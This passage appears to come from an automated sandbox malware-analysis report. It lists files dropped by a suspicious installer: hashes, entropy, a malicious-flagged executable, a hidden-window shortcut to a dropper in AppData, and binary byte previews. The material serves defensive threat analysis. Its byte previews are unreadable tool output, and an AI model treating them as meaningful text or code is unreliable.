                                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2df2896d-1ea7-4e46-b1bf-ea65311792ee.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\584404b7-a625-40ed-bb64-20dda24c701d.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):154477
                                                                                                                                                            Entropy (8bit):7.835886983924039
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                            MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                            SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                            SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                            SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Hebephrenia_20250106170400.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):968
                                                                                                                                                            Entropy (8bit):5.422682064404116
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:mRKbAIeLLzz0RBQkRqcP2w9RqcP2MaR7fkcP2Uf6lR7fkcP2sMR7fkcP23hv:mmxYz0RvJvC9f7h6l9f7lM9f7Ov
                                                                                                                                                            MD5:25B9C067C7598A6DF2D9B71021AA6D91
                                                                                                                                                            SHA1:2B6A3A9D2E5C1D120691106EF39BF70AB300B8E7
                                                                                                                                                            SHA-256:5E91BEB2C3C040874D1284CBD7AD14BA10CF7ECB9358CAF6CC9694EEF6CF779D
                                                                                                                                                            SHA-512:CA1BCF3596DBF3D043C4D478A59D6EF38DBDCF6A9D6DEBD3E6E8EBF5D84D7BBFC249A360901CE5818E844F1CD403F29C48BEBFCD58CCE41ACEC5779A366E54E8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[1BB0:1BAC][2025-01-06T17:03:58]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe..[1BB0:1BAC][2025-01-06T17:03:58]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\w3245.exe -burn.filehandle.attached=540 -burn.filehandle.self=528'..[1BB0:1BAC][2025-01-06T17:03:58]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\w3245.exe'..[1BB0:1BAC][2025-01-06T17:03:58]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1BB0:1BAC][2025-01-06T17:04:00]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Hebephrenia_20250106170400.log'..[1BB0:1BAC][2025-01-06T17:04:00]i000: Setting string variable 'WixBundleName' to value 'Hebephrenia'..[1BB0:1BAC][2025-01-06T17:04:00]i000: Setting string variable 'WixBundleManufacturer' to value 'Windlestraw'..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2364728
                                                                                                                                                            Entropy (8bit):6.606009669324617
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                            MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                            SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                            SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                            SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: 9mauyKC3JW.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: upgrade.hta, Detection: malicious, Browse
                                                                                                                                                            • Filename: MiJZ3z4t5K.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: UolJwovI8c.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: ONHQNHFT.msi, Detection: malicious, Browse
                                                                                                                                                            • Filename: es.hta, Detection: malicious, Browse
                                                                                                                                                            • Filename: BkTwXj17DH.exe, Detection: malicious, Browse
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\c6ee5f4d-7ef9-4f6b-8cc0-e4f4c8174370.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11185
                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\cbf6e798

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5698949
                                                                                                                                                            Entropy (8bit):7.742488641620752
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:n+H5f7DiV9F4J09curnesgCUmMFckkVYXaPvvox:Y5zDw9FRzrefFFkmXQvvox
                                                                                                                                                            MD5:005514AFFA56E5F3F6FE803344FE1ED8
                                                                                                                                                            SHA1:DFB87B0EBDABEB703BBA4ECCDAF34FBBA6BE1D1F
                                                                                                                                                            SHA-256:80ED23F72A1EC8992CB86616D00D7C36B1A5903ADC2DF0424BFF0528BC02F984
                                                                                                                                                            SHA-512:B93D80177247BE71F6831776302F79B8D1C5EB87A8865B37E8A6A0ED5BE4074E243DBC41E6915A8AD20BDCAFDD0425F3BD9E588F0F2783F2A022EEDED9841D43
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Y3J%[3J%Z3J%Z3J%[3J%~3J%N3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3K%.r.u.r.d.o.L9A%V5U>y.Z$A5D9y.G+W...@4F.u(\-W;^9y.G+W.F:%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.\.K3G#D6Z0@.KJ%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.\.W?R>@.]9Q;])@Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.d.k.z...~#F(\9J<Gdk.g.c(R'@-\8NZ3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%,.d.t.z.h.J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):353
                                                                                                                                                            Entropy (8bit):5.346884086764322
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YEyL1d+qynP56s/uyL1dwcEXpHEuQJjDrwv/uyL10ZWvGP56s/C:Yt13256s//1mp0Dkv//11i56s/C
                                                                                                                                                            MD5:32476C0D33020910F2C00BDD6EAFD4F2
                                                                                                                                                            SHA1:82A27DBD5B08A04C8AD86F39DC50C9B62E4561EB
                                                                                                                                                            SHA-256:AB3EEE93E9F199B86308B849A992081DD753391307782D032AD09543C1C15D85
                                                                                                                                                            SHA-512:A3F7AA43D964918FAD101C6E6538A7E09EA67868F5184853EC3D08103038DA58C6A626F969C97BFD0868EC0182443CA938C9A9781CD5E5F34CF2DA63C05CCB85
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"logTime": "0106/220504", "correlationVector":"tpHCHeS01AGZQJUdY4JSSe","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0106/220504", "correlationVector":"24BFD88065F846AAAF9AE4D5957A3E2B","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "0106/220504", "correlationVector":"EPNPWReibIjs4+ZA468qbC","action":"EXTENSION_UPDATER", "result":""}.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\e1d6143a

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5698949
                                                                                                                                                            Entropy (8bit):7.742488581380998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:k+H5f7DiV9F4J09curnesgCUmMFckkVYXaPvvox:X5zDw9FRzrefFFkmXQvvox
                                                                                                                                                            MD5:40292E5442FA7F44AF725A8BC315E80E
                                                                                                                                                            SHA1:9EA6359AC7BDB0C5978A81B4F7C39C11F0A13352
                                                                                                                                                            SHA-256:E8EE34A6884A4346A35E8A9EF5DFB8D19C1121E93934F43CD021B8C3D1F27F64
                                                                                                                                                            SHA-512:D7C20B1A0C33CC9E0E860D0779EB7D32DAE17E09CBDF92F0936568F2256D6AB2A569AA5AAF9D8A9B9A4840672F194A84237F0429542525914D9F7C4BF6F78C23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Y3J%[3J%Z3J%Z3J%[3J%~3J%N3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3K%.r.u.r.d.o.L9A%V5U>y.Z$A5D9y.G+W...@4F.u(\-W;^9y.G+W.F:%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.\.K3G#D6Z0@.KJ%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.\.W?R>@.]9Q;])@Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.d.k.z...~#F(\9J<Gdk.g.c(R'@-\8NZ3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%,.d.t.z.h.J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ea1b522f-a0a0-47c8-b790-331c5731c97f.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\f7c7a66a-e85c-46a6-801f-fe4c5fc4c344.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):31335
                                                                                                                                                            Entropy (8bit):7.694019108205432
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                            MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                            SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                            SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                            SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\fkefe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jan 6 21:04:02 2025, mtime=Mon Jan 6 21:04:02 2025, atime=Fri Jan 3 17:35:24 2025, length=6487736, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):926
                                                                                                                                                            Entropy (8bit):5.022645800380404
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:8eBd6/KX+hZNoUt2Fgvi8ATsRUUoqfBm:8CdCRZNoUPv+m9om
                                                                                                                                                            MD5:DF24604C96B0D4598694703AF221B42C
                                                                                                                                                            SHA1:FDCA053713EEAB76908A3AEF49A90A53C5B0F739
                                                                                                                                                            SHA-256:DE12CA678123CACD9CC3DF42299504C3445D6E674DC72359878A03D665BCE12D
                                                                                                                                                            SHA-512:5DEF470BF391B89C592867D01ECAA096AA795B657612AA72231A6E263E725A54DF124688070C835095CC2440A8749887AE3E90F177466529D2AAE6AB21A05634
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F.... .......`....;.`....]@.^....b.......................:..DG..Yr?.D..U..k0.&...&......vk.v.....?.`...G..`......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^&Z|............................%..A.p.p.D.a.t.a...B.V.1.....&Z....Roaming.@......CW.^&Z............................;.P.R.o.a.m.i.n.g.....^.1.....&Z....TASKMA~1..F......&Z..&Z...............................T.a.s.k.M.a.n.a.g.e.....r.2...b.#Zl. .RESCUE~1.EXE..V......&Z..&Z................................R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.......k...............-.......j............7.......C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe..+.....\.....\.R.o.a.m.i.n.g.\.T.a.s.k.M.a.n.a.g.e.\.R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.`.......X.......284992...........hT..CrF.f4... .`.T..b...,.......hT..CrF.f4... .`.T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\lshbkgxootar

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2602496
                                                                                                                                                            Entropy (8bit):6.716476069650749
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
                                                                                                                                                            MD5:55CA99F0DC9854368750B8886DC455FC
                                                                                                                                                            SHA1:A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
                                                                                                                                                            SHA-256:08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
                                                                                                                                                            SHA-512:D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_330363768\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1753
                                                                                                                                                            Entropy (8bit):5.8889033066924155
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                            MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                            SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                            SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                            SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                            Malicious:false
